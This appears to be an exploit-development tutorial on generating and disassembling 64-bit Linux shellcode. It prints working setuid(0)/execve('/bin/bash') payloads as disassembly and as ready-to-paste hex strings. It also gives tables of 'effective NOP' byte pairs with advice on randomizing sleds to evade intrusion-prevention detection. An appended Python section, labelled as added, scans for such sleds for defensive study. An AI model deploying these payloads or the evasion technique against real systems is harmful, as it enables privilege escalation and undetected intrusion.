Generating shellcode
objdump -d shellcode.o
shellcode.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 ff xor %rdi,%rdi
3: 6a 69 push $0x69
5: 58 pop %rax
6: 0f 05 syscall
8: 57 push %rdi
9: 57 push %rdi
a: 5e pop %rsi
b: 5a pop %rdx
c: 6a 68 push $0x68
e: 48 b8 2f 62 69 6e 2f movabs $0x7361622f6e69622f,%rax
15: 62 61 73
18: 50 push %rax
19: 54 push %rsp
1a: 5f pop %rdi
1b: 6a 3b push $0x3b
1d: 58 pop %rax
1e: 0f 05 syscall
for i in $(objdump -d shellcode.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05
##########################################################################################################
Shellcode Disassembly
Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does; the easiest way to do this is with objdump. In this example we'll use the example code we just constructed, the shortest 64-bit setuid() shell online:
╭─user@host ~
╰─➤ echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
shellcode: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 48 31 ff xor %rdi,%rdi
3: 6a 69 pushq $0x69
5: 58 pop %rax
6: 0f 05 syscall
8: 57 push %rdi
9: 57 push %rdi
a: 5e pop %rsi
b: 5a pop %rdx
c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi
13: 2f 73 68
16: 48 c1 ef 08 shr $0x8,%rdi
1a: 57 push %rdi
1b: 54 push %rsp
1c: 5f pop %rdi
1d: 6a 3b pushq $0x3b
1f: 58 pop %rax
20: 0f 05 syscall
Most modern-day IPS systems are capable of recognizing ASCII NOP sleds because of their popularity in modern exploitation; many IPS systems look for long strings of repeating characters. The solution to this problem is to use 'effective NOPs' instead of plain NOPs. Combined with a randomization sequence, this avoids IPS detection in a few simple steps.
ASCII NOP Pairs (Figure 1)
ASCII Pair  Hex Opcode  Register  Instructions Used  Commonly Detected
AI          \x41\x49    %ecx      INC, DEC           No
@H          \x40\x48    %eax      INC, DEC           Yes
BJ          \x42\x4A    %edx      INC, DEC           No
CK          \x43\x4B    %ebx      INC, DEC           No
DL          \x44\x4C    %esp      INC, DEC           No
EM          \x45\x4D    %ebp      INC, DEC           No
FN          \x46\x4E    %esi      INC, DEC           No
GO          \x47\x4F    %edi      INC, DEC           No
The pair can be put in any order, e.g. AI, IA, @H, H@, as long as both characters are used the same number of times. They can even be jumbled together. The above is only true when using INC and DEC NOPs exclusively.
ASCII NOP Pairs (Figure 2)
ASCII Pair  Hex Opcode  Register  Instructions Used  Commonly Detected
PX          \x50\x58    %eax      PUSH, POP          No
QY          \x51\x59    %ecx      PUSH, POP          No
RZ          \x52\x5A    %edx      PUSH, POP          No
S[          \x53\x5B    %ebx      PUSH, POP          Yes
T\          \x54\x5C    %esp      PUSH, POP          Yes
U]          \x55\x5D    %ebp      PUSH, POP          Yes
V^          \x56\x5E    %esi      PUSH, POP          Yes
W_          \x57\x5F    %edi      PUSH, POP          Yes
a`          \x61\x60    ALL       PUSH, POP          Yes
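As an added defender-side example, not code from the original page: a Python scan that flags runs of bytes drawn from the Figure 1 and Figure 2 opcode ranges instead of looking for repeated characters, and checks whether an INC/DEC sled is register-neutral in the sense described under Figure 1. The 16-byte threshold, the sample sled and the prose sample are constructed assumptions.

```python
# Added example (not from the original page): a defender-side scan for the
# "effective NOP" sleds of Figures 1 and 2. A heuristic that only looks for
# repeated characters misses a randomized mix of these bytes; this scan tests
# set membership instead. Caveat: these are 32-bit encodings; in 64-bit mode
# 0x40-0x4F are REX prefixes and 0x60/0x61 (PUSHA/POPA) are invalid.
from typing import Dict, List, Tuple

# 0x40-0x4F INC/DEC r32, 0x50-0x5F PUSH/POP r32, 0x60 PUSHA, 0x61 POPA
EFFECTIVE_NOP_BYTES = frozenset(range(0x40, 0x62))
REG_NAMES = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

def find_effective_nop_runs(data: bytes, min_len: int = 16) -> List[Tuple[int, int]]:
    """Return (offset, length) for each run of at least min_len consecutive
    bytes drawn entirely from EFFECTIVE_NOP_BYTES."""
    runs, start = [], None
    for i, b in enumerate(data):
        if b in EFFECTIVE_NOP_BYTES:
            start = i if start is None else start
        else:
            if start is not None and i - start >= min_len:
                runs.append((start, i - start))
            start = None
    if start is not None and len(data) - start >= min_len:
        runs.append((start, len(data) - start))
    return runs

def incdec_net_effect(run: bytes) -> Dict[str, int]:
    """Net INC minus DEC count per register over the 0x40-0x4F bytes of run.
    All zeros means the sled leaves every register unchanged, which is the
    "same number of times, any order" condition stated under Figure 1."""
    net: Dict[str, int] = {}
    for b in run:
        if 0x40 <= b <= 0x4F:
            reg = REG_NAMES[b & 7]  # low 3 bits of the opcode select the register
            net[reg] = net.get(reg, 0) + (1 if b < 0x48 else -1)
    return net

# Constructed sample: a 32-byte randomized INC/DEC sled followed by the 32-byte
# /bin/bash shellcode extracted earlier on this page. Its leading 0x48 (a REX
# prefix) is also in the range, so the reported run is 33 bytes, one past the
# true sled: confirm the boundary by disassembling at the reported offset.
SLED = b"AIIA@HH@BJJBCKKC" * 2
PAYLOAD = (b"\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x6a\x68\x48\xb8"
           b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x54\x5f\x6a\x3b\x58\x0f\x05")
SAMPLE = SLED + PAYLOAD
# Mixed-case prose never forms a long run; an all-caps word such as
# "ABCDEFGHIJKLMNOPQRSTUVWXYZ" does, which is the main false-positive source.
PROSE = b"Most modern IPS systems look for repeating characters"
```

Run `find_effective_nop_runs(SAMPLE)` to get the candidate sled offsets, then `incdec_net_effect` on the flagged bytes to see whether the sled is register-neutral.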